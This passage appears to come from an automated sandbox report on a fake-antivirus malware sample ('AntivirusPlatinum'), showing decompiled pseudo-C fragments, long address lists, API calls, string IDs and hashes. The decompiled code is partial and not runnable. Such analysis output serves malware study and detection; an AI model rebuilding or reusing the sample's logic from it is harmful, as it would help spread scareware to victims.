                                                                                                                                                      												__esi = __ebp + 0xc;
                                                                                                                                                      												 *0x41a820 = E0040B7BA(__esi, __eflags);
                                                                                                                                                      											}
                                                                                                                                                      											 *0x41a817 = 1;
                                                                                                                                                      											goto L152;
                                                                                                                                                      										case 9:
                                                                                                                                                      											L113:
                                                                                                                                                      											__eflags =  *(__ebp + 0x10) - 5;
                                                                                                                                                      											if( *(__ebp + 0x10) != 5) {
                                                                                                                                                      												goto L152;
                                                                                                                                                      											}
                                                                                                                                                      											L114:
                                                                                                                                                      											_push(1);
                                                                                                                                                      											L87:
                                                                                                                                                      											__ebp - 0x1c34 = E0040BD80(__ebp - 0x1c34, __ecx); // executed
                                                                                                                                                      											goto L152;
                                                                                                                                                      										case 0xa:
                                                                                                                                                      											goto L0;
                                                                                                                                                      										case 0xb:
                                                                                                                                                      											L150:
                                                                                                                                                      											__eflags =  *(__ebp + 0x10) - 7;
                                                                                                                                                      											if( *(__ebp + 0x10) == 7) {
                                                                                                                                                      												 *0x419f90 = 1;
                                                                                                                                                      											}
                                                                                                                                                      											goto L152;
                                                                                                                                                      										case 0xc:
                                                                                                                                                      											L80:
                                                                                                                                                      											__eax =  *(__ebp - 0x1c34);
                                                                                                                                                      											__eax = E0040A250(__ecx,  *(__ebp - 0x1c34));
                                                                                                                                                      											__eflags = __eax - 0x46;
                                                                                                                                                      											if(__eax == 0x46) {
                                                                                                                                                      												 *0x419edd = 1;
                                                                                                                                                      											} else {
                                                                                                                                                      												__eflags = __eax - 0x55;
                                                                                                                                                      												if(__eax == 0x55) {
                                                                                                                                                      													 *0x419edc = 1;
                                                                                                                                                      												} else {
                                                                                                                                                      													 *0x419edd = 0;
                                                                                                                                                      													 *0x419edc = 0;
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      											goto L152;
                                                                                                                                                      									}
                                                                                                                                                      									L2:
                                                                                                                                                      									_t232 = E0040A925(_t232,  *(_t309 - 4));
                                                                                                                                                      									 *(_t309 - 4) =  *(_t309 - 4) + 0x1000;
                                                                                                                                                      									_t9 = _t309 - 0xc;
                                                                                                                                                      									 *_t9 =  *((intOrPtr*)(_t309 - 0xc)) - 1;
                                                                                                                                                      									if( *_t9 != 0) {
                                                                                                                                                      										goto L2;
                                                                                                                                                      									} else {
                                                                                                                                                      										 *(_t309 - 4) =  *(_t309 - 4) & 0x00000000;
                                                                                                                                                      										goto L4;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      								L153:
                                                                                                                                                      								return _t231;
                                                                                                                                                      							}
                                                                                                                                                      							goto L147;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					goto L152;
                                                                                                                                                      				}
                                                                                                                                                      			}







                                                                                                                                                      0x0040c78e
                                                                                                                                                      0x0040c78e
                                                                                                                                                      0x0040c78e
                                                                                                                                                      0x0040c78e
                                                                                                                                                      0x0040c792
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c798
                                                                                                                                                      0x0040c798
                                                                                                                                                      0x0040c7a0
                                                                                                                                                      0x0040c7a5
                                                                                                                                                      0x0040c7a5
                                                                                                                                                      0x0040c7a8
                                                                                                                                                      0x0040c7cd
                                                                                                                                                      0x0040c7aa
                                                                                                                                                      0x0040c7aa
                                                                                                                                                      0x0040c7aa
                                                                                                                                                      0x0040c7ad
                                                                                                                                                      0x0040c7c4
                                                                                                                                                      0x0040c7af
                                                                                                                                                      0x0040c7af
                                                                                                                                                      0x0040c7af
                                                                                                                                                      0x0040c7b0
                                                                                                                                                      0x0040c7bb
                                                                                                                                                      0x0040c7b2
                                                                                                                                                      0x0040c7b2
                                                                                                                                                      0x0040c7b2
                                                                                                                                                      0x0040c7b0
                                                                                                                                                      0x0040c7ad
                                                                                                                                                      0x0040c7db
                                                                                                                                                      0x0040c7e2
                                                                                                                                                      0x0040c7e9
                                                                                                                                                      0x0040c7f0
                                                                                                                                                      0x0040c7f5
                                                                                                                                                      0x0040c7fc
                                                                                                                                                      0x0040c83d
                                                                                                                                                      0x0040c846
                                                                                                                                                      0x0040c84b
                                                                                                                                                      0x0040c84d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c84f
                                                                                                                                                      0x0040c84f
                                                                                                                                                      0x0040c851
                                                                                                                                                      0x0040c858
                                                                                                                                                      0x0040c85e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c860
                                                                                                                                                      0x0040c860
                                                                                                                                                      0x0040c860
                                                                                                                                                      0x0040c862
                                                                                                                                                      0x0040c865
                                                                                                                                                      0x0040c86c
                                                                                                                                                      0x0040c86e
                                                                                                                                                      0x0040c875
                                                                                                                                                      0x0040c878
                                                                                                                                                      0x0040c87d
                                                                                                                                                      0x0040c87f
                                                                                                                                                      0x0040c8b1
                                                                                                                                                      0x0040c8b1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c8b1
                                                                                                                                                      0x0040c881
                                                                                                                                                      0x0040c881
                                                                                                                                                      0x0040c883
                                                                                                                                                      0x0040c886
                                                                                                                                                      0x0040c89a
                                                                                                                                                      0x0040c89a
                                                                                                                                                      0x0040c89a
                                                                                                                                                      0x0040c89b
                                                                                                                                                      0x0040c89b
                                                                                                                                                      0x0040c8a0
                                                                                                                                                      0x0040c8a1
                                                                                                                                                      0x0040c8a7
                                                                                                                                                      0x0040c8a7
                                                                                                                                                      0x0040c8a8
                                                                                                                                                      0x0040c8ad
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c8ad
                                                                                                                                                      0x0040c888
                                                                                                                                                      0x0040c888
                                                                                                                                                      0x0040c888
                                                                                                                                                      0x0040c88b
                                                                                                                                                      0x0040c88c
                                                                                                                                                      0x0040c892
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c892
                                                                                                                                                      0x0040c867
                                                                                                                                                      0x0040c867
                                                                                                                                                      0x0040c86a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c8b3
                                                                                                                                                      0x0040c8b3
                                                                                                                                                      0x0040c8b4
                                                                                                                                                      0x0040c8b4
                                                                                                                                                      0x0040c8b9
                                                                                                                                                      0x0040c8bb
                                                                                                                                                      0x0040c8bd
                                                                                                                                                      0x0040c8bd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c7fe
                                                                                                                                                      0x0040c7fe
                                                                                                                                                      0x0040c805
                                                                                                                                                      0x0040c813
                                                                                                                                                      0x0040c81a
                                                                                                                                                      0x0040c81f
                                                                                                                                                      0x0040c821
                                                                                                                                                      0x0040c827
                                                                                                                                                      0x0040c833
                                                                                                                                                      0x0040c833
                                                                                                                                                      0x0040c8c0
                                                                                                                                                      0x0040c8c0
                                                                                                                                                      0x0040c8c7
                                                                                                                                                      0x0040c8d0
                                                                                                                                                      0x0040c8d7
                                                                                                                                                      0x0040c8d7
                                                                                                                                                      0x0040c8e3
                                                                                                                                                      0x0040c8f2
                                                                                                                                                      0x0040c8f9
                                                                                                                                                      0x0040c905
                                                                                                                                                      0x0040c90a
                                                                                                                                                      0x0040c911
                                                                                                                                                      0x0040c91a
                                                                                                                                                      0x0040c926
                                                                                                                                                      0x0040c92d
                                                                                                                                                      0x0040c92d
                                                                                                                                                      0x0040c939
                                                                                                                                                      0x0040c940
                                                                                                                                                      0x0040c945
                                                                                                                                                      0x0040c94c
                                                                                                                                                      0x0040c952
                                                                                                                                                      0x0040c954
                                                                                                                                                      0x0040c954
                                                                                                                                                      0x0040c968
                                                                                                                                                      0x0040c96d
                                                                                                                                                      0x0040c974
                                                                                                                                                      0x0040c979
                                                                                                                                                      0x0040c97b
                                                                                                                                                      0x0040c98c
                                                                                                                                                      0x0040c998
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c97d
                                                                                                                                                      0x0040c97d
                                                                                                                                                      0x0040c983
                                                                                                                                                      0x0040c988
                                                                                                                                                      0x0040c98a
                                                                                                                                                      0x0040c99d
                                                                                                                                                      0x0040c9a8
                                                                                                                                                      0x0040c9b4
                                                                                                                                                      0x0040c9b6
                                                                                                                                                      0x0040c9b8
                                                                                                                                                      0x0040c9c1
                                                                                                                                                      0x0040c9c8
                                                                                                                                                      0x0040c9ca
                                                                                                                                                      0x0040c9cc
                                                                                                                                                      0x0040c9d5
                                                                                                                                                      0x0040c9dc
                                                                                                                                                      0x0040c9de
                                                                                                                                                      0x0040c9e0
                                                                                                                                                      0x0040c9e9
                                                                                                                                                      0x0040c9f7
                                                                                                                                                      0x0040c9fc
                                                                                                                                                      0x0040ca03
                                                                                                                                                      0x0040ca07
                                                                                                                                                      0x0040ca15
                                                                                                                                                      0x0040ca15
                                                                                                                                                      0x0040ca2a
                                                                                                                                                      0x0040ca2a
                                                                                                                                                      0x0040ca48
                                                                                                                                                      0x0040ca4d
                                                                                                                                                      0x0040ca52
                                                                                                                                                      0x0040bfe1
                                                                                                                                                      0x0040bff8
                                                                                                                                                      0x0040bffe
                                                                                                                                                      0x0040c001
                                                                                                                                                      0x0040c001
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c021
                                                                                                                                                      0x0040c03c
                                                                                                                                                      0x0040c043
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c045
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c045
                                                                                                                                                      0x0040c043
                                                                                                                                                      0x0040c04a
                                                                                                                                                      0x0040c04e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c054
                                                                                                                                                      0x0040c057
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c05e
                                                                                                                                                      0x0040c05e
                                                                                                                                                      0x0040c062
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c068
                                                                                                                                                      0x0040c074
                                                                                                                                                      0x0040c088
                                                                                                                                                      0x0040c094
                                                                                                                                                      0x0040c0a7
                                                                                                                                                      0x0040c0b2
                                                                                                                                                      0x0040c0c4
                                                                                                                                                      0x0040c0cf
                                                                                                                                                      0x0040c0d4
                                                                                                                                                      0x0040c0dd
                                                                                                                                                      0x0040c0e3
                                                                                                                                                      0x0040c0e8
                                                                                                                                                      0x0040c0ea
                                                                                                                                                      0x0040c256
                                                                                                                                                      0x0040c25c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c0f0
                                                                                                                                                      0x0040c0f0
                                                                                                                                                      0x0040c0f5
                                                                                                                                                      0x0040c0f5
                                                                                                                                                      0x0040c0fe
                                                                                                                                                      0x0040c104
                                                                                                                                                      0x0040c10b
                                                                                                                                                      0x0040c1bb
                                                                                                                                                      0x0040c1c2
                                                                                                                                                      0x0040c1c4
                                                                                                                                                      0x0040c1c7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c1c9
                                                                                                                                                      0x0040c1d0
                                                                                                                                                      0x0040c1d6
                                                                                                                                                      0x0040c1d8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c1da
                                                                                                                                                      0x0040c1da
                                                                                                                                                      0x0040c1dd
                                                                                                                                                      0x0040c1de
                                                                                                                                                      0x0040c1e6
                                                                                                                                                      0x0040c1f5
                                                                                                                                                      0x0040c1f7
                                                                                                                                                      0x0040c201
                                                                                                                                                      0x0040c203
                                                                                                                                                      0x0040c206
                                                                                                                                                      0x0040c1e0
                                                                                                                                                      0x0040c1e0
                                                                                                                                                      0x0040c1e0
                                                                                                                                                      0x0040c1e3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c208
                                                                                                                                                      0x0040c216
                                                                                                                                                      0x0040c21c
                                                                                                                                                      0x0040c21e
                                                                                                                                                      0x0040c220
                                                                                                                                                      0x0040c225
                                                                                                                                                      0x0040c227
                                                                                                                                                      0x0040c234
                                                                                                                                                      0x0040c234
                                                                                                                                                      0x0040c227
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c21e
                                                                                                                                                      0x0040c206
                                                                                                                                                      0x0040c1d8
                                                                                                                                                      0x0040c111
                                                                                                                                                      0x0040c116
                                                                                                                                                      0x0040c119
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c11f
                                                                                                                                                      0x0040c12d
                                                                                                                                                      0x0040c139
                                                                                                                                                      0x0040c145
                                                                                                                                                      0x0040c14a
                                                                                                                                                      0x0040c14d
                                                                                                                                                      0x0040c150
                                                                                                                                                      0x0040c163
                                                                                                                                                      0x0040c16c
                                                                                                                                                      0x0040c171
                                                                                                                                                      0x0040c173
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c179
                                                                                                                                                      0x0040c187
                                                                                                                                                      0x0040c195
                                                                                                                                                      0x0040c19a
                                                                                                                                                      0x0040c19c
                                                                                                                                                      0x0040c19d
                                                                                                                                                      0x0040c1a7
                                                                                                                                                      0x0040c1ae
                                                                                                                                                      0x0040c1b5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c1b5
                                                                                                                                                      0x0040c152
                                                                                                                                                      0x0040c159
                                                                                                                                                      0x0040c15e
                                                                                                                                                      0x0040c161
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c23a
                                                                                                                                                      0x0040c23a
                                                                                                                                                      0x0040c243
                                                                                                                                                      0x0040c249
                                                                                                                                                      0x0040c24e
                                                                                                                                                      0x0040c24e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c0f5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c266
                                                                                                                                                      0x0040c266
                                                                                                                                                      0x0040c26a
                                                                                                                                                      0x0040c270
                                                                                                                                                      0x0040c275
                                                                                                                                                      0x0040c277
                                                                                                                                                      0x0040c27a
                                                                                                                                                      0x0040c27c
                                                                                                                                                      0x0040c284
                                                                                                                                                      0x0040c284
                                                                                                                                                      0x0040c289
                                                                                                                                                      0x0040c289
                                                                                                                                                      0x0040c28d
                                                                                                                                                      0x0040c297
                                                                                                                                                      0x0040c29f
                                                                                                                                                      0x0040c28f
                                                                                                                                                      0x0040c28f
                                                                                                                                                      0x0040c28f
                                                                                                                                                      0x0040c2a1
                                                                                                                                                      0x0040c2a3
                                                                                                                                                      0x0040c2b4
                                                                                                                                                      0x0040c2a5
                                                                                                                                                      0x0040c2a5
                                                                                                                                                      0x0040c2a5
                                                                                                                                                      0x0040c2bc
                                                                                                                                                      0x0040c2c7
                                                                                                                                                      0x0040c2cc
                                                                                                                                                      0x0040c2d1
                                                                                                                                                      0x0040c2d3
                                                                                                                                                      0x0040c2d5
                                                                                                                                                      0x0040c2d5
                                                                                                                                                      0x0040c2d8
                                                                                                                                                      0x0040c2da
                                                                                                                                                      0x0040c2df
                                                                                                                                                      0x0040c2e3
                                                                                                                                                      0x0040c2ea
                                                                                                                                                      0x0040c2ea
                                                                                                                                                      0x0040c2e3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c2f4
                                                                                                                                                      0x0040c2f4
                                                                                                                                                      0x0040c2f8
                                                                                                                                                      0x0040c308
                                                                                                                                                      0x0040c308
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c313
                                                                                                                                                      0x0040c313
                                                                                                                                                      0x0040c317
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c31d
                                                                                                                                                      0x0040c31d
                                                                                                                                                      0x0040c324
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c32a
                                                                                                                                                      0x0040c32a
                                                                                                                                                      0x0040c331
                                                                                                                                                      0x0040c337
                                                                                                                                                      0x0040c33e
                                                                                                                                                      0x0040c340
                                                                                                                                                      0x0040c340
                                                                                                                                                      0x0040c347
                                                                                                                                                      0x0040c34c
                                                                                                                                                      0x0040c351
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c357
                                                                                                                                                      0x0040c357
                                                                                                                                                      0x0040c357
                                                                                                                                                      0x0040c359
                                                                                                                                                      0x0040c35b
                                                                                                                                                      0x0040c408
                                                                                                                                                      0x0040c408
                                                                                                                                                      0x0040c40a
                                                                                                                                                      0x0040c36e
                                                                                                                                                      0x0040c376
                                                                                                                                                      0x0040c37b
                                                                                                                                                      0x0040c37d
                                                                                                                                                      0x0040c384
                                                                                                                                                      0x0040c389
                                                                                                                                                      0x0040c38b
                                                                                                                                                      0x0040c38d
                                                                                                                                                      0x0040c391
                                                                                                                                                      0x0040c393
                                                                                                                                                      0x0040c393
                                                                                                                                                      0x0040c391
                                                                                                                                                      0x0040c39e
                                                                                                                                                      0x0040c3aa
                                                                                                                                                      0x0040c3ba
                                                                                                                                                      0x0040c3c4
                                                                                                                                                      0x0040c3d3
                                                                                                                                                      0x0040c3d9
                                                                                                                                                      0x0040c3e1
                                                                                                                                                      0x0040c3e6
                                                                                                                                                      0x0040c3e8
                                                                                                                                                      0x0040c3fd
                                                                                                                                                      0x0040c3fd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c3e8
                                                                                                                                                      0x0040c410
                                                                                                                                                      0x0040c410
                                                                                                                                                      0x0040c412
                                                                                                                                                      0x0040c41e
                                                                                                                                                      0x0040c41e
                                                                                                                                                      0x0040c430
                                                                                                                                                      0x0040c436
                                                                                                                                                      0x0040c438
                                                                                                                                                      0x0040c43e
                                                                                                                                                      0x0040c445
                                                                                                                                                      0x0040c453
                                                                                                                                                      0x0040c463
                                                                                                                                                      0x0040c463
                                                                                                                                                      0x0040c469
                                                                                                                                                      0x0040c470
                                                                                                                                                      0x0040c472
                                                                                                                                                      0x0040c479
                                                                                                                                                      0x0040c47e
                                                                                                                                                      0x0040c484
                                                                                                                                                      0x0040c485
                                                                                                                                                      0x0040c489
                                                                                                                                                      0x0040c497
                                                                                                                                                      0x0040c497
                                                                                                                                                      0x0040c489
                                                                                                                                                      0x0040c4a2
                                                                                                                                                      0x0040c4a4
                                                                                                                                                      0x0040c4b0
                                                                                                                                                      0x0040c4b2
                                                                                                                                                      0x0040c4b8
                                                                                                                                                      0x0040c4c6
                                                                                                                                                      0x0040c4c6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c4b8
                                                                                                                                                      0x0040c414
                                                                                                                                                      0x0040c414
                                                                                                                                                      0x0040c418
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c418
                                                                                                                                                      0x0040c361
                                                                                                                                                      0x0040c361
                                                                                                                                                      0x0040c365
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c36b
                                                                                                                                                      0x0040c36b
                                                                                                                                                      0x0040c36b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c36b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c4d0
                                                                                                                                                      0x0040c4d0
                                                                                                                                                      0x0040c4d1
                                                                                                                                                      0x0040c4d6
                                                                                                                                                      0x0040c4d8
                                                                                                                                                      0x0040c4db
                                                                                                                                                      0x0040c4db
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c511
                                                                                                                                                      0x0040c511
                                                                                                                                                      0x0040c518
                                                                                                                                                      0x0040c518
                                                                                                                                                      0x0040c51b
                                                                                                                                                      0x0040c548
                                                                                                                                                      0x0040c548
                                                                                                                                                      0x0040c54f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c54f
                                                                                                                                                      0x0040c51d
                                                                                                                                                      0x0040c51d
                                                                                                                                                      0x0040c51d
                                                                                                                                                      0x0040c520
                                                                                                                                                      0x0040c535
                                                                                                                                                      0x0040c535
                                                                                                                                                      0x0040c53c
                                                                                                                                                      0x0040c53c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c53c
                                                                                                                                                      0x0040c522
                                                                                                                                                      0x0040c522
                                                                                                                                                      0x0040c522
                                                                                                                                                      0x0040c523
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c525
                                                                                                                                                      0x0040c525
                                                                                                                                                      0x0040c525
                                                                                                                                                      0x0040c526
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c52c
                                                                                                                                                      0x0040c52c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c59d
                                                                                                                                                      0x0040c59d
                                                                                                                                                      0x0040c5a1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c5a7
                                                                                                                                                      0x0040c5a7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c5b9
                                                                                                                                                      0x0040c5b9
                                                                                                                                                      0x0040c5bd
                                                                                                                                                      0x0040c71c
                                                                                                                                                      0x0040c71c
                                                                                                                                                      0x0040c720
                                                                                                                                                      0x0040c726
                                                                                                                                                      0x0040c72d
                                                                                                                                                      0x0040c72f
                                                                                                                                                      0x0040c72f
                                                                                                                                                      0x0040c739
                                                                                                                                                      0x0040c739
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c720
                                                                                                                                                      0x0040c5c3
                                                                                                                                                      0x0040c5cf
                                                                                                                                                      0x0040c5dc
                                                                                                                                                      0x0040c5e1
                                                                                                                                                      0x0040c5e5
                                                                                                                                                      0x0040c5e7
                                                                                                                                                      0x0040c5f4
                                                                                                                                                      0x0040c5f4
                                                                                                                                                      0x0040c5f4
                                                                                                                                                      0x0040c5fa
                                                                                                                                                      0x0040c600
                                                                                                                                                      0x0040c601
                                                                                                                                                      0x0040c607
                                                                                                                                                      0x0040c608
                                                                                                                                                      0x0040c609
                                                                                                                                                      0x0040c60b
                                                                                                                                                      0x0040c60e
                                                                                                                                                      0x0040c614
                                                                                                                                                      0x0040c615
                                                                                                                                                      0x0040c617
                                                                                                                                                      0x0040c61a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c5ee
                                                                                                                                                      0x0040c5ee
                                                                                                                                                      0x0040c5ee
                                                                                                                                                      0x0040c5ee
                                                                                                                                                      0x0040c5f1
                                                                                                                                                      0x0040c5f1
                                                                                                                                                      0x0040c61c
                                                                                                                                                      0x0040c628
                                                                                                                                                      0x0040c62e
                                                                                                                                                      0x0040c635
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c63b
                                                                                                                                                      0x0040c63b
                                                                                                                                                      0x0040c642
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c648
                                                                                                                                                      0x0040c64a
                                                                                                                                                      0x0040c651
                                                                                                                                                      0x0040c658
                                                                                                                                                      0x0040c65d
                                                                                                                                                      0x0040c65f
                                                                                                                                                      0x0040c69f
                                                                                                                                                      0x0040c69f
                                                                                                                                                      0x0040c6a6
                                                                                                                                                      0x0040c6af
                                                                                                                                                      0x0040c6bb
                                                                                                                                                      0x0040c6c9
                                                                                                                                                      0x0040c6c9
                                                                                                                                                      0x0040c6d5
                                                                                                                                                      0x0040c6e3
                                                                                                                                                      0x0040c6ed
                                                                                                                                                      0x0040c6f4
                                                                                                                                                      0x0040c6fa
                                                                                                                                                      0x0040c6fd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c703
                                                                                                                                                      0x0040c703
                                                                                                                                                      0x0040c705
                                                                                                                                                      0x0040c705
                                                                                                                                                      0x0040c70a
                                                                                                                                                      0x0040c711
                                                                                                                                                      0x0040c716
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c716
                                                                                                                                                      0x0040c6fd
                                                                                                                                                      0x0040c661
                                                                                                                                                      0x0040c661
                                                                                                                                                      0x0040c663
                                                                                                                                                      0x0040c66a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c66c
                                                                                                                                                      0x0040c66c
                                                                                                                                                      0x0040c66c
                                                                                                                                                      0x0040c674
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c676
                                                                                                                                                      0x0040c676
                                                                                                                                                      0x0040c677
                                                                                                                                                      0x0040c67f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c681
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c681
                                                                                                                                                      0x0040c683
                                                                                                                                                      0x0040c68b
                                                                                                                                                      0x0040c692
                                                                                                                                                      0x0040c697
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c745
                                                                                                                                                      0x0040c745
                                                                                                                                                      0x0040c749
                                                                                                                                                      0x0040c74b
                                                                                                                                                      0x0040c752
                                                                                                                                                      0x0040c75e
                                                                                                                                                      0x0040c75e
                                                                                                                                                      0x0040c764
                                                                                                                                                      0x0040c76c
                                                                                                                                                      0x0040c76c
                                                                                                                                                      0x0040c771
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c77d
                                                                                                                                                      0x0040c77d
                                                                                                                                                      0x0040c781
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c787
                                                                                                                                                      0x0040c787
                                                                                                                                                      0x0040c5a9
                                                                                                                                                      0x0040c5af
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040ca1d
                                                                                                                                                      0x0040ca1d
                                                                                                                                                      0x0040ca21
                                                                                                                                                      0x0040ca23
                                                                                                                                                      0x0040ca23
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c55b
                                                                                                                                                      0x0040c55b
                                                                                                                                                      0x0040c563
                                                                                                                                                      0x0040c568
                                                                                                                                                      0x0040c56b
                                                                                                                                                      0x0040c591
                                                                                                                                                      0x0040c56d
                                                                                                                                                      0x0040c56d
                                                                                                                                                      0x0040c570
                                                                                                                                                      0x0040c585
                                                                                                                                                      0x0040c572
                                                                                                                                                      0x0040c572
                                                                                                                                                      0x0040c579
                                                                                                                                                      0x0040c579
                                                                                                                                                      0x0040c570
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c008
                                                                                                                                                      0x0040c00c
                                                                                                                                                      0x0040c011
                                                                                                                                                      0x0040c018
                                                                                                                                                      0x0040c018
                                                                                                                                                      0x0040c01b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c01d
                                                                                                                                                      0x0040c01d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c01d
                                                                                                                                                      0x0040c01b
                                                                                                                                                      0x0040ca58
                                                                                                                                                      0x0040ca5c
                                                                                                                                                      0x0040ca5c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c98a
                                                                                                                                                      0x0040c97b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c7fc

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040A250: OemToCharBuffA.USER32 ref: 0040A25E
                                                                                                                                                        • Part of subcall function 0040A250: CharUpperA.USER32(00000000,?,?,0040B53D,?,00000000,00000000,74CB61F0,00000000,00000000), ref: 0040A269
                                                                                                                                                        • Part of subcall function 0040A250: CharToOemBuffA.USER32 ref: 0040A27C
                                                                                                                                                      • SHChangeNotify.SHELL32(00001000,00000001,00000000,00000000), ref: 0040CA15
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Char$Buff$ChangeNotifyUpper
                                                                                                                                                      • String ID: $"$.lnk$/$/
                                                                                                                                                      • API String ID: 3722132714-4221205064
                                                                                                                                                      • Opcode ID: 27bf3f6fec95a07f86dd67e8e14781f846cc3590ad8cb4fe44e6cc38865bcf63
                                                                                                                                                      • Instruction ID: ac79738b4ffa8067dea208a906377ff97dd7469831f8120efdd6494ba044edeb
                                                                                                                                                      • Opcode Fuzzy Hash: 27bf3f6fec95a07f86dd67e8e14781f846cc3590ad8cb4fe44e6cc38865bcf63
                                                                                                                                                      • Instruction Fuzzy Hash: AB7181B290525CA9EB21E7A0CD85BDAB7BC9B04304F0445F7A145F6182DB78AB88CF59
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
